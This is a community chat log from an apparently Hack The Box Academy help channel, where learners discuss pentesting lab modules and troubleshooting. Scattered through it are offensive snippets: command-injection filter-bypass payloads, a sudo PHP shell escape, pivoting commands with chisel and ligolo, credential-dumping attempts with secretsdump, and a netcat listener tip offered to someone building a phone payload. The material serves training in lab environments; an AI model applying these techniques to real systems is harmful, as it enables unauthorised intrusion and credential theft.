#modules

read #welcome and #rules to learn about the server: if this server isn't what you're looking for you can freely leave

Where do I go for the windows version?

just download the pre-compiled binary

https://github.com/jpillora/chisel/releases/tag/v1.7.3

All they showed was the ubuntu version in the module.

literally took me like 5 seconds to find using google

https://github.com/jpillora/chisel/releases

this is actually where you'll find the latest release for chisel

Hello everyone, I'm currently stuck on the FootPrinting hard lab and would like a push in the right direction.

161

or alternatively: udp

both my hints relate to the same thing

I've used 161 but I'm not really sure what to do after the initial command

also in the future it helps to give any bit of context to where you're stuck

wdym? you have the community string yeah?

Cool, I'll check the github releases. Thanks.

My bad, I will be sure to do so.

Is there a htb section on ligolo?

Im on the beginning of metasploit and ive followed every step so far, but where im supposed to get control of the system the service times out. "Service start timed out" instead of whats supposed to happen, it doesnt even use ms17_010 as check, it just goes to target os

think: what service does that port relate tool and what tools from one of the sections may help further

I'm not 100% sure

the result will be in brackets ||[b*]||

If not I found this

https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

man that @hallow kiln guy seems familiar

so; take a step back - you used onesixty one to grab the community string, what step would be next to make use of it

yup, that's a good resource

if needed reread the section related to the service

I think thats my problem I can't get the community string, when I used 161 it just gave me a message saying "Scanning 1 hosts, 16383 communities"

I'm not 100% sure if I need to use a command from there or if I used the wrong command to begin with

you can add JH vid to it.
https://youtu.be/qou7shRlX_s?si=DyilZCOTTdCg5nAY

the SeclList snmp.txt file should work

i believe that's the one from the section

Okay let me give that a try, I thought I had used it but I may not have

it'll give you a bunch of info including the community string in brackets

it'll start with b

so it's completely easy to overlook

Thank you, I did just overlook it the first time. I'll continue from here and see if I can get the rest on my own, again thank you for your time!

no problem!

fun fact: I spent an hour on this because I didn't realize the obvious

(I didn't read the brief which would have been more revelatory)

Tried tunneling to MS01 on the AD Skills Assessment with

proxychains xfreerdp /v:172.16.6.100 /u:<user> /p:<pass>

and got some strange errors.

I used the following command on the windows box:

./chisel server -v -p 1234 --socks5

And this is my attack machine:

My proxychains is set up properly too

Why is this not working?

Just wanted to let you all know I got passed the FootPrinting hard lab!

I also attempted with the reverse tunnel.

fun fact: ligolo doesn't use proxychains

so you don't gotta worry about any sorta proxy conf

Is there something I'm doing wrong here? I'm assuming that I should be able to finish the assessment with the tools covered before moving on to try a second time with ligolo.

i haven't messed with chisel before ¯_(ツ)_/¯

ligolo is really simple to set up and get running tbh

Is RDP the correct method in for this box? Just want to make sure I'm not wasting time. I see the tun0 in my ifconfig, but I can't even nmap the MS01 IP (172.xxx.xx.....)

idk haven't done it yet

proxychains and nmap don't play well together usually you'd have to add -Pn

It just keeps spamming this

I even got a fresh linux version to make sure the versions matched at v1.9.1

I used the NoPac exploit and received the tgt from both ACADEMY-EA-DC01.ccache administrator_ACADEMY-EA-DC01.inlanefreight.local.ccache. I then updated the KRB5CCNAME with the ACADEMY-EA-DC01.ccache ticket. I then tried to use secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. this is not working can someone explain to me what I can achieve with the ccache files?

Hello! I'm in the module "shells and payloads" at "The Live Engagement", I already have the shell... but not the flag look

And the question is: Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

||But there is nothing at C:\Users\Administrator||

Someone could help me pls?

I think you should reset the target and redo the steps

How did you get the shell btw?

By ||a web shell and then a reverse shell ||

Hmmmmm alright

I see, instead of port 80, there's a relatively easier approach via smb vulnerable to a popular exploit.

Review your Nmap scan results for relevant details.

I did again and get the same thing

Yeah, it seems that there is only one way

Then use smb

Yeah, actually I did it before but there are like 4 or 5 exploits and it's kind of confusse which one is the correct to use, anyway I'm still trying

One should catch your attention; it was demonstrated in the module.

Ready! it's done! Thank you so much dude!

But it should have worked before with the web shell I think

No problem, host 3 is the easiest^^

I didn’t think of that vector once I saw smb.

I thought that smb was a kind of rabbit hole lol

Because I tried to enumerate with smbclient, smbmap, rpclient and see if I could upload a file or something like that but there was nothing, but well, it's all about trying harder

more like trying simpler things.
Enumeration is the key.

The AD Enumeration and Attacks Skills Assessment is no joke

hey bro do you solved this,if you solved it,can I dm you?

bro do you solved this,if you solved this,can I dm you

any tips for + 1 What is the FQDN of the IP address 10.10.34.136?
Information Gathering - Web Edition

Page 7
Active Subdomain Enumeration

Active Subdomain Enumeration

I NEED HELP WITH SOME PEOPLE

why

@rustic sage

can anybody tell me why my responder is not catching the hash

In Documentation & Reporting Practice Lab We can send the report to mrb3n for him to check it out.. How can I get to him?

What module are you working on?

Responder

can someone tell me why this wont work ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://10.129.234.14 -H "HOST: FUZZ.inlanefreight.htb"

do i have edit /etc/hosts

Stuck on ntlm relay attack skills assesment last question i am not able to find any relay to compromise dc.. can someone Give me a hint

In the Password Spraying section of the Crackmapexec module, I found the user, but I don't know the answer format, so I am basically wrong now. I would be grateful if someone would give a hint. This is the problem description: "Is there any other local MSSQL account created with the same username and password as the corresponding Active Directory account?"

probably

user:password

@quick crane

lol,thanks,but this is error,but I solved it

In the module for AD enums and attacks I had an issue getting the stuff for attacking domain trusts using linux from child ->parent, the forced ticket I had created wasn't getting me NTLM hash of the user bross, and in order to get it I had to end up using a mix of raiseChild.py and then use my access with raisechild and magically transfer mimikatz into the DC for the parent domain domain and use mimikatz to get the hash for bross.

the thing is as arduous as this was to do, I found it odd that despite following the structure in the section I wasn't able to get in with the forged ticket. I made sure to use the right SIDs for the forgery, namely the ones for the child domain and the one for the user bross in the parent domain. It was super frustrating and it gave out this odd error when i ran secretsdump to get the hash for bross [-] ERROR_DS_NAME_ERROR_NOT_FOUND: Name translation: Could not find the name or insufficient right to see name.

practically had me cursin as i lost a ton of sleep to make this work, as something that should work just didnt, im literally going to bed angry lol ;c

I made sure to use the right SIDs for the forgery, namely the ones for the child domain and the one for the user bross in the parent domain - This isnt nessasary. The parent SSID user doesnt actually need to exist btw.

I cant really help you on the secretsdump because i ended up doing it the exact same way lol. Transfer mimikatz over and dumping the NTLM hash for the user bross.

Hello I search this do you have a idea why?

Hello do you have a idea why I don't find this :

Why I cannot send messages in #710108839063846964?

Did you verify your account like #welcome tells you?

Hello to you all, anyone willing to discuss about foothold on SKill assestment 2 in "Intro NOSQL Injection" module?

NVM got it to work!

Hello lovely people! Your local village idiot here again with another stupid question!

I managed to upoad LinEnum.sh to a machine with the path /var/www/html/theme.

I cannot execute the file even though the permissions look like this:
---x--x--x 1 www-data www-data 46631 Feb 7 10:01 LinEnum.sh

make sure you chmod +x the file first

chmod +x LinEnum.sh
./LinEnum.sh

I did, but the permissions didn't change

Would it make a difference if I uploaded it to /usr/local/bin where I have some permissions?

can I dm you

help me change my ip address pls

what?

i need help in changing my ip address

dms?

you can dm

Hi guys I've been stuck on this question for so long and keep getting left with a blank line ($ ... ) after I run the shellcode, I have no idea if I'm getting closer or further away, any help would be amazing. -- Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'. --

should include the module, section and question so that people know what you're asking about but here
#modules message

im getting a connection timed out on firefox in the parrot box. anybody had same problem

hello , does anyone have finished injection attacks skills assessment ?

Cheers bud, my bad

In this module https://academy.hackthebox.com/module/87/section/904

There's hyperlink into parrot os website, and the link is 404 https://www.parrotsec.org/security-edition/

Yeah

can i dm you ?

sure

https://academy.hackthebox.com/module/109/section/1038

who$@ami
w\ho\am\i

Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?

Could anyone figure out how to bypass the \ character in this exercise?

Module: Password Attacks
Hard Lab: https://academy.hackthebox.com/module/147/section/1356
Issue: Timeouts when attempting to download a particular file.
Solution: Bash script which loops the file download.
Question: Is there an alternative (easier) way to get this sorted out?

There are more ways to bypass blacklisted filters shown in this section. Try them as well

I know but the question is how to include a \ in whoami to be able to execute the command as it is on a blacklist

bypass tha \

that's the question...

who$@ami

would prop work

Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?

w'h'o'am'i

the point is how to bypass the \...

idk. Try the ones in the module.

w"h"o"am"i
w'h'o'am'i
%0aw'h'o'am'i
who$@ami
w\ho\am\i
who^ami

I think you didn't get the point

well, what do i know. Ive only gotten the flag

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.014/0.014/0.014/0.000 ms
www-data

weird huh

yeah me too, but the question is how to bypass the \ character with knowledge of the previous section.

IN **AD Enumeration & Attacks - Skills Assessment Part II

• Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host**
  I want to upload a file to SQL01, I can enter to mssql as netdb, but can't upload files, so I don't know how to escalate privileges... (also found ||SeImpersonatePrivilege|| but I need to upload files for this too)

for example with:

echo $(tr '!-}' '"-~'<<<[)

\
or

echo ${PATH:0:1}

/

yeah ok. use the path

But i dont see the problem? You have a RCE that works. And you know how to bypass the / character using the PATH

that's the problem, the is no ENV for the \ character

and the only payload tha may work is

echo $(tr '!-}' '"-~'<<<[)

but don't

think about how you can get a shell with mssql

well the \ is not common to find on a linux host. So unless you are on a windows host idk

yeah

what you could try is wordlist attack on ENV and see if you can find anything lol

idk lol

Attacking Thick Client Applications module is very bad...

Stuck on Attacking Common Applications: Attacking Common Applications - Skills Assessment II
Question:
Obtain reverse shell access on the target and submit the contents of the flag.txt file.

I have found the password for the nagXXX application. Trying to get reverse shell using msfconsle, set every parameters correctly but still keeps failing like this

Can anyone give a little nudge to solve this last question..!!!

With this section, I really went numb!!!!

I think you are using the wrong exploit

take it with a grain of salt tho since its been a while since this module

mmm....
ok need to use other exploit??

dm me the password you are trying

Try looking at the version and find a matching exploit

i want to make sure its correct

sent

point..
let me check again

no

<@&861185840277487616>

damn, too quick

sorted

heehe

pwning you bastard

❤️

🤍

Lol you can ping that?

Hilarious. Imagine being the person who said something like that and it just guys replied to and called out lmao

always

I'll prob get banned if I try it out so I won't even lol

i mean i ping it to notify those with the roles that someone is being a grade A dumbass with blatant rules violations

That happens a lot here

People trying to learn how to hack but can't read a small list of rules lmao

sometimes it can be benefit of the doubt and redirected: but it's not always the case

90% people just want to hack their ex; 10% people actually wanna learn

Stg. It's very cringe to see. In high school I've been asked many times to either hack something or teach somebody to hack. Some mf offered me $1000 before to teach him how to build a botnet 😂 mf hit me up on Facebook and I don't even ever talk to him. This was after Hugh school was done with too. So random.

I bet he's in jail now lmao

Anyways I'll move over to general I just woke up and modules happened to be opened

(and shit I've realized people still ask after school)

A bit confused in the intro active directory module.. if anyone can help me that would be great.

I might be the worst hacker in the world

Just bashing my head into the table, watching people solve things that I seem incapable of doing

Hi all, can someone help me with the below question?

There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

This is Snort Rule development in the SOC Analyst path.

why does it say "The Disabled Forced Restarts GPO will have precedence over the Logon Banner GPO since it would be processed last"
isn't the "disabled forced restarts GPO" under the "local security policy"?

Google says that "GPOs are processed in what's known as an LSDOU order: local, site, domain, organization unit (OU). That means first, the policy on the local computer gets processed. This is followed by Active Directory policies from the site level to the domain"

so wouldn't the "disabled forced restarts GPO" be overwritten by logon banner and thus the logon banner have precedence over the disabled forced restarts?

Hello everyone, I'm currently working on the CBBH certification and I just finished the section "Abusing Intermediary Applications" of the "Server-side attacks" module. On the practical side, I had no issues but when it comes to the usage of what I learned, I'm a bit confused. I don't see what's the practical usage of this. For other vulnerabilities, there were explanations and exercises on how to abuse the weakness. On this one, I just set up nginx and connect to a tomcat sever but what's the following, how do we levarage that ? Note that I'm a beginner in web penetration testing (I've only followed htb academy courses) and have close to zero knowledge of back-end server management. I would be very thankful if someone could explain to me what's the utility of accessing the target's tomcat panel.

I am very new to the platform and wanted to ask if I'll get unlimited instance spawns per day even if I purchase the minimum number of cubes? If yes, for how long will I get these unlimited spawns per day?
Thanks.

Windows File Transfer, am I using the Parrot OS web browser VM to perform the PS commands?

for unlimited pwnbox usage you need to do a monthly or annual sub, if you just buy cubes you don't get unlimited pwnbox usage. However, it is usually recommended to just set up your own VM and use that as pwnbox if you have the hardware to do that. It is easier and more comfortable

the point is that you set up a nginx server to connect to the TARGETs tomcat server via the ajp proxy. So you were able to get access to a internal website through the ajp protocol by setting up your own nginx and connecting to it

and getting access to tomcat is juicy because if you manage to get credentials for tomcat (and they might be set to the default credentials because the administrator of the server thinks that tomcat is not exposed to the internet) you can get a shell very quickly

Thank you 😉

hi guys i need help

Module: File Transfer
Section : Linux File transfer methods
Task: 2 ( + 3 Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer. )

does not accept my answer

my command on server : hasher upload_nix.zip

you need to unzip the file first

So I'm on the GetSimple part of "getting started" module and I got access to box fairly easy, but I'm having trouble with escalation. The LinEnum.sh file says that /usr/bin/php can be used without root so that means I need to make a PHP shell, right? But that's where I'm getting stuck.

I've tried this and I'm getting nowhere:

export CMD="/bin/sh" php -r 'system(getenv("CMD"));'

you need to tell it to actually run as root by using sudo

you are just allowed to run it as sudo without providing a pw

The whole command?

OR two parts seperately? I know that's a stupid question but I don't know the answer

its work thx for help

Also thank you for helping

it won't allow you to run the first part as sudo (you can only do /usr/bin/php, remember), so only that part. You can do both lines in one by doing php -r 'system("/bin/sh")', GTFOBins likes to split command and execution but its not necessary to do so

Hi, can someone help me with double-pivoting with ligolo? I tried some guides but none worked for me

single pivot works though?

Yes

I've been using it consistently and want to keep using it for double pivot as well

Thank you! Now it is returning PHP Parse Error: syntax error, unexpected end of file in Command line code on line 1

I'm not sure if I ever used it for double pivot, but my notes say listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp on your attack host (in ligolo proxy), then ./agent.exe -connect 172.16.8.120:11601 -ignore-cert on the machine that can connect to the second internal network to connect it to the machine in the first internal network (172.16.8.120 here) and then add the new network on your attack host sudo ip route add 172.16.9.0/24 dev ligolo

oh, it needs a ";" after the ")"

php -r 'system("/bin/sh");'

OMG it worked thank you 😭

LOL that's the same task I'm on and I need the double pivot for
So I've done that, and I get a connection back to ligolo, but then this happens:

Agent : root@dmz01] » INFO[4166] Agent joined.                                 name="INLANEFREIGHT\\Administrator@DC01" remote="127.0.0.1:37764"
[Agent : root@dmz01] » 
[Agent : root@dmz01] » session
? Specify a session : 4 - #4 - INLANEFREIGHT\Administrator@DC01 - 127.0.0.1:37764
[Agent : INLANEFREIGHT\Administrator@DC01] » start
error: a tunnel is already using this interface name. Please use a different name using the --tun option

I'm not sure if you even need to do the "session" and "start" part for the second pivot?

Thank you

I can't ping rn, so I guess I need them

It doesn't make sense that we wouldn't need them, as a session established doesn't start active tunneling to another network

In @hallow kiln blog it get's the following error message: Tunnel already running, switch from <first agent> to <second agent>? Y/N, but for me it just fails for some reason

How did you get on? I am having similar problems.

looking at the code, they reworked that part 2 months ago in ligolo-ng

I guess you have to set up another tun interface and do "start --tun newinterface" ?

yap, I tried it before and it failed for a stupid reason, but now it works. Thanks!

yeah, my post is older than the latest release, they've switched some things up now, I was gonna link to this message #modules message but sounds like you got it working

Yeah, thank! I really appreciate all the help

well he can't fuzz for the password because LDAP would be dumb to let you search for a users pw. They had to guess (or maybe there was a hint in the machine) that a administrator set up the account like that and put the password as description string to remember it easier, thinking that noone has access to the description

isn't analysis still an active box, why is there a writeup and why are you sharing it

You can stop and start sessions btw, it can get a tiny bit tedious, the other option is creating another tunnel for you to specify with start

<@&861185840277487616>

Hello there, I'm doing the step-by-step of User Account Control section under WinPrivEsc, but when I fired up the command to receive a reverse shell based on the dll {under user path} the reverse shell is not received, any idea why or what can I be missing?

In this case I can't, because the second session is dependent on the tunnel the first session creates
I just added another interface as you and others suggested and used it

It's not

Once you have the second session you can stop and start the second one

Source: I did it

wdym? Stop the first session?

Select session 1: stop
Select session 2: start

It is active but expired. Will not gain anything if pawned.
Was sure this would trigger miscomprehension, this is why I added context info and carefully shadow informations, apprently, not everyone is responsible of reading what tthey read, i let moderator do their moderation, and apologize for the situation

The older versions would do that swap seemlessly

then I got session2 lost connection.., because it's dependent on the tunnel of session1

So now it doesn't 😦

It is active but expired. Will not gain anything if pawned.
Was sure this would trigger miscomprehension, this is why I added context info and carefully shadow informations, apprently, not everyone is responsible of reading what tthey read, i let moderator do their moderation, and apologize for the situation

This channel isn't for any conversation regarding boxes

Read #welcome and #rules

which one is?

This channel is specifically for academy modules

#boxes

it says i have no access

Man if only there was a way to gain access

Some sort of instructions or something

wonderful "community"

I told you: read #welcome

This wasn't to be cheeky

you still gain points, just not seasonal, active boxes are still active boxes, no public writeups allowed, seasonal is another thing

Seasonal boxes are still in active rotation

I also reported the writeup via /spoiler

👍

But anyway; instructions on accessing more of the server is found in #welcome

well, i thought it was a place to learn and share apparently its a placewhere to lose time wondering if i ask a question when everyone is willing to hear that, lsorry, my eperience is bad, i quit thanks bye

lol

Bruh

Imagine being told "hey this is where you get info"

Module: HTTPS/TLS ATTACKS
Section: Bleichenbacher & DROWN
Question: Performing this section's questions is proving painful. Working with TLS-Breaker had all kinds of errors being thrown which prevented the premaster secret from being dropped. I tried working with alternative tools to nab it, but the output doesn't appear compatible with the expected formatting. Is someone available to DM for aid?

I like this mode to ask....

im getting unable to write to file. Any ideas why?

Have you tried asking nicely?

What module? Maybe you're not supposed to write to this file

Or there is a file in that portion that can be written to

im doing the entripse attack

im doing the Attacking Enterprise Networks

im following the steps and it says to edit that 404.php file

i am doing the btute force module on the ssh page, i am pasting the exact command i have to send but it is giving me this error

Ah most people do that blind

Try to reset?

Most people treat AEN as a mock cpts exam

Yo marice, I just finished the CPTS path, how do you recommend to prepare for the exam?

Just jump into it

the more you try and prepare, the more likely you are to overthink ¯_(ツ)_/¯

well i was treating it like that but then couldnt write to the 404.php and went to see the writeup and it was saying to do the same thing i was already doing...

You're right, any advice about set up? Other than using ligolo, maybe set up a windows vm, etc

guys am I tripping? or is this paragraph self contradictory ?

"The GPO with the lowest Link Order is processed last"
"the Disallow LM Hash GPO will be processed first"

"Lowest" as in highest number, longer list

It's like firewall rules

It goes in-order

oh

alright that makes more sense. thanks

Ye, its silly like that

anyone know the answer to this?

even in their own questionnaire they contradict themselves

It's not a contradiction

Domain overwrites site.

No matter what's done locally, if domain says "you can't do that" then you can't do that

that's my understanding as well.. but read this, it contradicts that

How do i use a reverse connection without open port in router?

actually wait... now that I read it more I understand what they mean. What I was thinking was that "OU containing user or computer objects" means the local computer so that would mean the "local security policy".

... I think

OU = organizational unit

Generally that's a group

What should i do to use a reverse connection without open a port in router?

What are you trying to do?

Repeating your question doesn't add clarity

If you're trying to get a reverse connection on a public site you will need to do port forwarding. But it sounds like you're trying to do something illegal, more context is needed

Trying to exploit my own Phone with a payloader created on Msfconsole

But the connection does not stablish because of The port i am not find opened

I tried tô config in The router configs, no success

My network is lan i think

Well if they're on the same network you don't need to do any router configs

But even with The Lan ip i am not being able

This has nothing to do with htb academy however

I fill my ip but i need a port and i dont know which one

Read #rules and #welcome

Ok

Thanks

All you need is to start a listener on your device netcat -lvnp 9999

Then use that port

Alright will try it

can I copy ur style?

WinPrivEsc | UAC section, the reverse shell by SystemPropertiesAdvanced.exe is not working..!!!, I'm doing what is explained in the content, any hint would be appreciated...

AD Enumeration & Attacks - Skills Assessment Part I, Question 6, "Submit this user's cleartext password. ", any tips how to get it ? I've spent many hours already in just one question...

?

As a windows system engineer, I would said every GPO you apple from OU should consider as "Global" policy, "local security policy" should refer to something like setting apply directly to the machine.

For example, apply Harding configuration to a windows machine before domain join <- this should be consider as "local security policy".

A little bit late in the party but if you still have problem with this send me a DM.

Whatever you'd like to do, friend.

I list all of that other information to help others help me. If they know the section/module upfront, its easier to contextualize the problem

Module : Server Side Attacks, Section: SSRF Exploitation Exemple. Hi, I have a problem of understanding with this section. Indeed, after we find the the first SSRF, we fuzz the ports of the localhost and find this "http://<TARGET IP>/load?q=http://127.0.0.1:5000" and it says it's an app but then when we want to look at the "index.php" of this app and we go look at "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html" why ? I tested to curl "http://<TARGET IP>/load?q=http://127.0.0.1:5000/load?q=index.html" instead but it didn't work. In my understanding, we fuzz the ports to discover the internal app but my first question is : How do we know that 127.0.0.1:5000 maps to internal.app.local (except the fact that it is an exercise and there is only one port and only one internal app)? In this exercice, it looks like we don't really care that there is an application listening on 127.0.0.1:5000 as we know (from the page source of the very first ip) that an "internal.app.local" exists, furthermore I don't even understand why we care fuzzing the ports. As you can see I'm a bit lost and would appreciate a little help. Thank you in advance.

Linux file transfer, curl and wget are both not working. Says unable to connect. The question says to use python but I dont see any download tools with python. Anybody available to assist?

If you're using pwnbox: is the target a public_ip:port? The pwnbox has limited internet functionality if you didn't buy amy cubes or a sub

Using my own VM

Second part of my question: public-ip:port?

not sure what you mean by that

How is the target given to you

Is it 10.129.x.x or something like 94.124.24.223:12345

10.129.202.54

Ah OK then. Are you connected to the vpn?

yea

Last question: what's your command?

wget https://<target-ip>/flag.txt -O flag.txt

Https

That's your problem

change it to http 👍

The amount of times I slap my forehead going through this course

Most of the times the targets aren't running https

I should have known to atleast try http

i've been stuck at the sme part for a bit now, linux introduction, system information, i am tasked with giving the directory in which the htb-student mail is found, yet after search through what feels like every directory i have found absolutly nothing

does anyone have a push in the right direction?

have you tried locate or find commands?

This won't actually help

i have yea

However
env
Or
echo $MAIL

i am so dumb.

i tried that and forgot to add the $

In bash all variables are called with $

are there no channels discussing machines??

#boxes but you need to have reading comprehension to access it, #welcome <--

@reef birch thank you mate I did it 🙂

Bumping for visibility:

Module: HTTPS/TLS ATTACKS
Section: Bleichenbacher & DROWN

Question: Performing this section's questions is proving painful. Working with TLS-Breaker had all kinds of errors being thrown which prevented the premaster secret from being dropped. I tried working with alternative tools to nab it, but the output doesn't appear compatible with the expected formatting. Is someone available to DM for aid?

thanks! @fathom pendant

it really takes time to dump the key, I spent all 90 minutes of the spawing machine, Also TLS-Breaker works fine with Java 11 but with Java 17 for me didn't run.

Module: WinProvEsc
Section: User Account Control
Question: I'm doing what it's explained in the section to escalate privileges thru SystemPropertiesAdvanced.exe attack and it's not working {DLL with reverse shell Payload is placed into the user Path}

I'm working my way through "SIEM & SOC Fundamentals" and just read the "What Is A SIEM Use Case?" section under "SIEM Use Case Development".

I'm having a hard time grasping what this section is trying to tell me. I took a stab at trying to summarize it for my notes:

It feels like what they are trying to communicate is you design a use case for the data/logs/events you record in a SIEM
- Example: We collect logs for login attempts, we can configure events for failed login attempts, the use case for these events is we can detect malicious actors attempting to brute force an account

Does that seem about right?

Link to the specific page: https://academy.hackthebox.com/module/211/section/2253

Yeah, it took me a minute to realize that the TLS-Breaker Github Wiki explicitly says JDK 11. That's what was having me get hung-up

Thank you

I think its just two exercises in one. On one hand it shows you that you can scan for internal services by port fuzzing, on the other hand it shows you that you can also fuzz for internal vhosts by putting the full url. I guess the exercise wants you to know that you have those options and should be open to them when you find a ssrf. The port 5000 and internal.app.local have nothing to do with each other

Technically you can’t even be sure that internal.app.local is even on the same host. It could be on a completely different host that is accessible from the host you are attacking

finally 🙂

Nice, good job! That was a annoying one

hehe yes

hard lab was quite hard tbh 🙂

but i learned a lot

and those labs are quite realistic to real world pentesting

And back and forth and back and forth

Honestly my favorite lab as it ties a bunch of knowledge together

someone help i found a valid password to login to ssh and i know for a fact im suppose to use a password and im getting this when trying to login:
ssh harry.potter@94.237.54.48 -p 22
harry.potter@94.237.54.48: Permission denied (publickey).
from what i understand that mean the server only accept public key auth but the exercise says im suppose to find a password

help🥲

looks like wrong port

the port should be given as a part of target ip

OMG

thank youuuuu

Biggest skill issue right there, Identifying public ips

😅

It's honestly troubling how deep some people get into the respective paths and don't know

the deeper the path go the more they let you fly , but yes

i so sucked @ easy lab because i was way overthinking 😄

That's generally how the easy labs are

You're thrown at a combination of taught subjects and don't know where to start

Then by the time you're in the headspace for hard it's gg ez

yes

never forget the basics

The only one that tripped me up was footprinting hard, but that's bc I can't read

Hey, I'm working on a report for the Attacking Enterprise Networks module (I've already finished the labs) and I am a bit lost If anyone has an example report he wrote with sysreptor for this module/other module/other network and can send it to me (free to dms) to use as a reference guide I would be very grateful

sorry can´t help on that ... and i need to sleep 🙂

cu

Ask ChatGPT 😉
(seriously)

hey has anyone done intro to assemble language

I am bit stuck on assessment 1 I have completed everything else

any help please pm me I am struggling been on this for couple days now

Can't we buy another monthly subscription before month ends?

It's generally on an autorenew

Hey Marcie, I want to cancel PayPal as payment method and add credit card as payment method. I am able to cances it from PayPal any insight?

Message support

I'm not staff so I wouldn't know how their payment processing works

Doing that right now as we chat

I have searched server, it's persistent issues with many, HTB resets the payment method from backend.

And wooo...!!!

Just finished the Attacking Thick Client Applications and Exploiting Web Vulnerabilities in Thick Client Applications.

It's not as bad people are making it out to be, the content is really good in the sense that you might stumble across a jar application and then the teachings of that section become invaluable. Could it be re-written for a clearer explanation? Sure, but one can make a case that all the content in Academy could be re-written for clearer explanations, and banging your head against the wall sometimes is good.

Being that, in the Attacking Thick Client Applications all you have to do is follow the examples. For some reason powershell only runs if you run it as an admin. Other than that it all boils down to following the example. Exactly as is shown.

In the Exploiting Web Vulnerabilities in Thick Client Applications the IP address of server.fatty.htb is already on the hosts file. You don't need to add it. You just need to check the file for the IP, then you'll know which interface you should use to listen with Wireshark.

The main takeaway in this module is that, you have the original Jar file, and then you mod this jar file so that it connects to the server. Further modifications need to be compiled. When you save the source code as shown on the module, you're saving the code that it's not compiled. Remember that .java files are not compiled, the compiled ones are .class.

All the module asks of you is to have two folders, one for the source code you'll need to modify , and the other one for the compiled files that will be built resulting in the .jar file. All you need to do is modify and compile the files you need, and swap them on their respective folder on the folder you'll be using to generate the .jar file. Everytime you swap files you'll need to generate a new jar file. And that's it. Really

The complaint isn't that it's bad; the complaint is that it's thrown in out of nowhere with little-to-no coding background/lead up to Java decompiling

It would be better if there was some other thing or if the pre-requisite Fundamentals covered some basics

But it was literally a late addition to the module

The other complaint being that it revolves around a retired insane machine

Where most stuff in the path is easy-medium modules comparatively

alright guys we finally did it! we finally after 7 days of agony, we have finally made it to the AD enumeration and attacks assessment!

I mean, the module pretty much chews all the content and it gives all the code you need and specifically tells you where and how to put it.

I really don't mind the challenge, what I do mind is answering questions where i have the right answer but have to try 10 different variations because no format was given, this is something that needs to be addressed ASAP.

It originally didn't

It took a boatload of complaints for it to be what it is now

You said it right..! Just have to follow the sections..!

But there were situations example where the address in x64dg in thick client application section do not appear. After running multiple times repeating the same steps, it appeared.

Yes nothing is prefect and hence the contents are..!! Feedback and rectifications make things better..!

Like a lot of the original complaints is that it

1. Came out of nowhere
2. Was nowhere near the same quality

But the people who were originally complaining about it are valid to complain, especially considering that portion isn't on the exam (yet) as there hasn't been word about the exam changing yet

So I finally figured out chisel on the Active Directory Skills Assessment 1 and was able to nmap the MS01 computer, however, port 3389 is closed and psexec is not working.

Is there a way to proxychains port 80, as in get access to the web interface if there is one open on port 80?

I see most people in the forum that got stuck were finally able to get to MS01 with xfreerdp, but that port is closed.

What other options do I have with ports 80, 139, 135, and 445?

I've done crackmapexec but that doesn't do a whole lot.

What can I do with this, anything?

I did crackmapexec with the --shares option

I have creds and now my chisel and proxychain configuration is working, what other options do I have to get this?

Tried evil-winrm, that didn't work either

I have no idea.

Even tried mssqlclient.py

for hydra, "-t" whats a common task number to add to improve speed or performance?

48 is common

It mostly depends on your network bandwidth

gotcha, ima try that

Some people can do 64 with no problems, I tend to get dropped connections with it

wmiexec.py also does not work

I can tell my proxychain is talking though.

I got smbclient to work, but there's really nothing useful in the files that I can find

Tried port 80, but the website just hangs

Should any of this be working? What am I missing?

if you route the whole http traffic through the victim host and the victim host has a website that tries to load external data (like a js file or a font from google), but the host itself has no internet then you will try to load these external ressources through the no-internet host and it will load a long time and not work properly

I got rpcclient rockin, but no good information

There is just no way for me to get a shell it feels like.

try curling the website so you at least know whats on there

it shouldn't hang with curl

Hey guys, I'm currently working on FUFF skill assesment, and I'm pretty sure I got a good response which doesn't fit in HTB input

Can anyone tell me where I'm wrong ?

/module/54/section/511

:If anybody tried one day to search the reply is not whateverdomain.academy.htb:448484/dir/found.xsx but whateverdomain.academy.htb:PORT/dir/found.xsx

I'm stuck on Academy Footprinting lab Hard

https://academy.hackthebox.com/module/112/section/1080

I've done Nmap with ports open, but don't know how to enumerate further

are you using the correct port? use the port they give you with the target instead.

You need to use the port that comes with the target

how can i see only modules that are relevant for the path im taking cbbh?

Enroll in the path and you will able to see them

i can see everything not only the modules that are relevant for my path

i have the annual sub

found it

wdym, for an example report?

why are targets not spawning ?

Hi everyone i am sitting with the DCSync section in Active Directory Enumeration & Attacks and have a question in the module it says For the portion of this section that requires interaction from a Linux host (secretsdump.py) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!. but when iam ping the ip adress 172.16.5.225 i get a request timeout and when i try to log on to the machine via ssh it says that the password is wrong ... what should i do ?

are you trying to ssh from your attack machine or MS01? only MS01 can access 172.16.5.225

iam trying to ssh from MS01

ligolo showing connection failed any thoughts how to troubleshoot that?

I want technical support

?

Why was my name changed?

